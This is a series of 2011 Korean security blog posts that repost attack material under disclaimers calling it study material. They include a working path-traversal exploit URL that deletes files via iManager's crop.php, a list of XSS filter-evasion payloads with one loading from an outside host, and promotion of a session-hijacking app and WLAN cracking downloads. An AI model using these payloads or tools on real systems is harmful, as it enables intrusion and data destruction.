이 세상에 괴짜인 친구들이 많습니다.
오래된 랩탑을 액자로 만들고
주변에 와이파이 해킹하여 사진 추출툴을 이용한 액자를 만들었네요.. =ㅅ=;;

 

국내에선 불법입니다. 근데 별다방 같은 개방된 망에서 사용하면 재미난 액자가 될 수도 있겠군요.;;



흠.. 제가 보안 담당자라면 불법 유출을 막는데 이 부분을 사용해도 나름 괜찮을 것 같습니다.
상시 모니터링 정도? ^^;  << 상당히 비쥬얼 하니깐요.

[출처 및 자세히 보기] freegeekvancouver & Click

[Notice: 본 글에 대하여 학습 및 보안 강화를 위해 참고하시고, 만약 악의적인 사용시 사용자 본인의 책임을 명시합니다.]

Posted by bitfox
l

OWASP 뉴질랜드 챕터에서 발간한  Clickjacking 관련 문서이다.
해킹에 관련하여 국내보단 해외가 더 자유롭게(?) 배포할 수 있어서 그런지는 몰라도 더 
상세히 기술되어 이해하기 용이하다.
국내에서는 잡혀갈지 모른다는 두려움이..-0-;; 쩝

 


[출처] Exploit-DB


[Notice: 본 글에 대하여 학습 및 보안 강화를 위해 참고하시고, 만약 악의적인 사용시 사용자 본인의 책임을 명시합니다.]

'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글

XSS in hidden field  (0) 2011.10.11
CRLF Injection  (0) 2011.09.28
XSS in Skype for iOS  (0) 2011.09.21
Cookiejacking  (0) 2011.09.15
홍커쪽 XSS 체크리스트  (0) 2011.09.14
Posted by bitfox
l

Skype가 아이폰 또는 아이팟의 iOS 운영체제에서 xss를 통해 Address book db를 탈취하는 시연장면이 동영상으로 공개되었습니다.


전 빨리 아이폰 그리고 맥북으로 갈아타고 싶은 마음뿐 +0+;;

[출처] 유튜브 http://www.youtube.com/watch?v=Ou_Iir2SklI&feature=player_embedded 


[Notice: 본 글에 대하여 학습 및 보안 강화를 위해 참고하시고, 만약 악의적인 사용시 사용자 본인의 책임을 명시합니다.]

'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글

CRLF Injection  (0) 2011.09.28
Clickjacking for Shells  (0) 2011.09.22
Cookiejacking  (0) 2011.09.15
홍커쪽 XSS 체크리스트  (0) 2011.09.14
Fake Facebook friend request email leads to malware  (0) 2011.09.05
Posted by bitfox
l

iManager Plugin v1.2.8 에 대한 리모트 취약점이 발견되었다.
(이 에디터는 단독으로 사용될 수 있으며 플러그인으로 tinyMCE, SPAW, htmlAREA, Xinha 그리고 FCKeditor에 사용되고 있을 수 있으니 확인하여 패치하자.)  

======================================================================
/scripts/phpCrop/crop.php:
----------------------------------------------------------------------
 
32: if( isset($_REQUEST['s']) ) {
33:     //delete previous temp files       
34:     $matches = glob($d . '{*.jpg,*.JPG}', GLOB_BRACE);     
35:     if ( is_array ( $matches ) ) {
36:          foreach ( $matches as $fn) {
37:               @unlink($fn);
38:          }
39: }
 
======================================================================
 
 
Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.14 (Win32)
           PHP 5.3.1
           MySQL 5.1.41
 
 
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com
 
 
Advisory ID: ZSL-2011-5043
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5043.php
 
 
15.09.2011
 
--
 
 
http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/phpCrop/crop.php?s=1&d=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftest.txt%00


[출처] http://securityswebblog.blogspot.com/2011/09/imanager-plugin-v128-d-remote-arbitrary.html

 

[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

Posted by bitfox
l
안드로이드용 faceniff 프로그램이 나왔다. 세션에 대한 보안 강화를 해야하지 않을까 싶다.
점점 모바일에서 구동되는 해킹 프로그램이 늘어나는 것 같아 우려스럽다.

[주의] 본 자료는 안전성이 검증되지 않은 자료이며, 접근시 바이러스 및 악성코드에 감염될 수 있습니다. 또한 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.


Droidsheep : Android Application for Session Hijacking 


Droidsheep is free alternate of faceniff which is available on download droidsheep website for free. Its one click hijacking tool which supports
  • Amazon.de
  • facebook.com
  • flickr.com
  • twitter.com
  • linkdein.com
  • yahoo.com
  • live.com
  • google.de (only the non-encrypted services like "maps")
What do you need to run DroidSheep.?

  • You need an android-powered device, running at least version 2.1 of Android
  • You need Root-Access on your phone (link)
  • You need DroidShep (You can get it in the "GET IT" section)

Download Droidsheep


[출처] http://thehackernews.com/2011/09/droidsheep-android-application-for.html
Posted by bitfox
l

SpyEye Trojan stole $3.2 million from US victims,Android users will be next target !


A Russian cybergang headed by a mysterious ringleader called ‘Soldier’ were able to steal $3.2 million (£2 million) from US citizens earlier this year using the SpyEye-Zeus data-stealing Trojan, security company Trend Micro has reported and Trusteer reports that an Android variant of Spitmo (SpyEye for mobile) has been discovered. The methodology sounds familiar for those familiar with ZeuS Mitmo and SpyEye Spitmo: infected computers inject a message into targeted netbanks prompting their customers to install software on their phones. Once Spitmo is installed, the SpyEye attacker is able to monitor incoming SMS and to steal MTAN authentication messages.

"His botnet was able to compromise approximately 25,394 systems between April 19, 2011 and June 29, 2011. And while nearly all of the victims were located in the US, there were a handful of victims spread across another 90 countries," it said in a blog post.

Over a six month period from January 2011, Trend found that the Soldier gang had been able to compromise a cross-section of US business, including banks, airports, research institutions and even the US military and Government, as well as ordinary citizens.A total of 25,394 systems were infected between 19 April and 29 June alone, 57 percent of which were Windows XP systems with even Windows 7 registering 4,500 victim systems.

Compromise on such a mass scale is not that unusual for criminals using toolkits like SpyEye, but the amounts stolen and the number of large organizations potentially impacted is cause for serious concern.”Victims included:

  • US Government (Local, State Federal)
  • US Military
  • Educational & Research Institutions
  • Banks
  • Airports
  • Other Companies (Automobile, Media, Technology)
  • C&C Infrastructure
Banking Trojans such as SpyEye and the older Zeus (possibly now merged with SpyEye) have been one of the malware stories of the last year, and have featured in a number of high-profile online crime cases.

Zeus for Android purports to be a version of Trusteer Rapport security software. This social engineering trick is used in an attempt to convince the user that the application they are installing is legitimate.SpyEye for Android, now detected by Sophos products as Andr/Spitmo-A, uses a slightly different but similar social engineering technique.

Spitmo was initially detected by F-Secure in April when a variant was used in an attack against a European bank - the Trojan added question fields to the bank's website, asking customers to enter their mobile phone number and the device's IMEI.Sean Sullivan, security advisor at F-Secure, said: “Spitmo.A contains the malicious executable (sms.exe) and another installer, which contains an executable named SmsControl.exe. SmsControl.exe will just display the message ‘Die Seriennummer des Zertifikats: Ü88689-1299F' to fool the user into thinking that the installer was indeed a certificate.“The name SmsControl.exe is quite a coincidence, as a variant of ZeusMitmo used the same name for the file containing the Trojan. Faking the Trojan to be a certificate is also a trick that ZeusMitmo has used. However, the code itself looks completely different than in ZeusMitmo.”


[출처] http://thehackernews.com/2011/09/sshtrix-fastest-multithreaded-sshv1-and.html

[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.
Posted by bitfox
l
무선랜 보안 종합 선물세트가 DVD로 출시 되었습니다.
동영상으로 인해 4기가가 조금 넘는 분량입니다.
이론부터 실습까지 동영상으로 친절한 인도(?)해커가 설명해 주고 있습니다.
(주변에 AP에 실습하지 마시고 다 로그에 남아요..-0-;)

관련 사진입니다.

(위 사진- ISO. 구동시 메뉴)

 

(위 사진 - 동영상 화면)


-----------------------------------------------------------------------------
[출처 및 다운로드 링크] - http://www.securitytube.net/downloads

We are happy to announce the general availability of the WLAN Security Megaprimer course DVD!

With over 40+ HD videos containing 12+ hours of Wireless Ownage, this DVD weighs in at around 4.2 Gigabytes!


A quick breakdown of the course topics and associated videos is available here.


Direct Download Links:


1. Mirror thanks to Mister_X from the Aircrack Team:
http://securitytube.aircrack-ng.org/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso


2. Mirror thanks to Chaos Darmstadt:
http://private.chaos-darmstadt.de/~alech/securitytube/WLAN-Security-Megaprimer-v1.iso


3. Mirror thanks to KokelNet.de (both IPv4 and IPv6!):
http://securitytube.kokelnet.de/DVDs/WLAN-Security-Megaprimer-v1.iso


4. Mirror to the BofH of Nikhef (both IPv4 and IPv6!):
http://wipkip.nikhef.nl/events/securitytube/DVD/WLAN-Security-Megaprimer-v1.iso


5. Mirror thanks to y0ug:
http://mirror2.codsec.com/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso

http://mirror.codsec.com/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso

6. Mirror thanks to Bernard from Insecure.co.nz :
http://www.insecure.co.nz/WLAN-Security-Megaprimer-v1.iso


7. Mirror thanks to djekl :
http://securitytube.djekl.co.uk/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso


Torrents:


1. Torrent thanks to Christiaan Rakowski:
http://csrakowski.dyndns.info/files/WLAN-Security-Megaprimer-v1.iso.torrent


2. Torrent thanks to Tobias Koopmann:
http://tracker.kokelnet.de/torrents/WLAN-Security-Megaprimer-v1.iso.torrent

 MD5 Hash: 939d8aa5eb2cd0fa63295953ecf36580

-----------------------------------------------------------------------------

[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.




Posted by bitfox
l
Backtrack 5를 이용한 무선랜 취약점 테스트 가이드 책이 출판되었다.
샘플 PDF를 받아 봤는데 이것만으로 충분히 삽질을 피해갈 수 있다.


아마존에서 판매 중이며 이북만 구매해 볼까 고민 중이다. 나의 아이패드가..놀고 있다. ;(
샘플 북에는 아래와 같은 공격방식을 설명하고 있다.

 Honeypot and Mis-Associati on attacks
 Caff e Latt e attack
 De-Authenti caton and Dis-Associati on attacks
 Hirte attack
 AP-less WPA-Personal cracking

WPA는 역시..사전공격이다. 흠..-ㅅ-;


[출처] 아마존

'위험한_친구들 > 그림자_WIFI' 카테고리의 다른 글

Another hack: Wiretap picture frame  (0) 2011.09.22
WLAN Security  (0) 2011.09.15
How to crack a WEP key and decrypt live traffic  (0) 2011.08.20
[spanish] Asaltando redes wifi  (0) 2011.08.16
Tutorial: How to Crack WPA/WPA2  (0) 2011.08.10
Posted by bitfox
l
IE 모든 버젼에서 나왔던 0-Day를 이용한 쿠키잭킹 방식이다.

[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

 


관련 동영상

'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글

Clickjacking for Shells  (0) 2011.09.22
XSS in Skype for iOS  (0) 2011.09.21
홍커쪽 XSS 체크리스트  (0) 2011.09.14
Fake Facebook friend request email leads to malware  (0) 2011.09.05
XSSed project  (0) 2011.08.31
Posted by bitfox
l

<STYLE>@import 'javascript:alert("xss1")';</STYLE>
<IMG SRC=javascript:alert('XSS2')>
<BODY BACKGROUND="javascript:alert('XSS3')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS4');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');">
<IFRAME SRC="javascript:alert('XSS6');"></IFRAME>
<DIV STYLE="background-image: url(javascript:alert('XSS7'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS8')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS9')")}</STYLE>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS10')></OBJECT>
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<script SRC="javascript:alert('xss11');"></script>
<video SRC="javascript:alert('xss12');"</video>
<LAYER SRC="javascript:alert('xss13')"></LAYER>
<embed src="javascript:alert('xss14')" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed>
<applet src="javascript:alert('xss15')" type=text/html>

[출처] 불분명..


[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글

XSS in Skype for iOS  (0) 2011.09.21
Cookiejacking  (0) 2011.09.15
Fake Facebook friend request email leads to malware  (0) 2011.09.05
XSSed project  (0) 2011.08.31
HTML Code Injection and Cross-site scripting  (0) 2011.08.31
Posted by bitfox
l